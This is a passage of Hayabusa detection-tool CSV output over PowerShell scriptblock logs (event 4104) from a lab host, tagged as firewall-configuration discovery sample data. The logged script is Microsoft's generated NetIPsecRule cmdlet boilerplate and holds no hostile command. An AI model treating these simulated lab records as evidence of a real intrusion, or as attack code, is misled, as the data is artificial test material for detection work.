$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 